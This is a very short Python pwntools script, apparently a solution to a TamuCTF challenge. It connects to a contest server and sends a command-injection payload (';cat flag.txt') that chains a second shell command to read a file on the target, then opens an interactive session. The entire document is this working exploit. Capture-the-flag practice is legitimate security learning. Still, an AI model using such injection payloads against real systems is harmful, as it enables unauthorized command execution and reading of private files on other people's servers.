from pwn import * sh = remote("pwn.tamuctf.com", 4324) sh.sendline(";cat flag.txt") sh.interactive()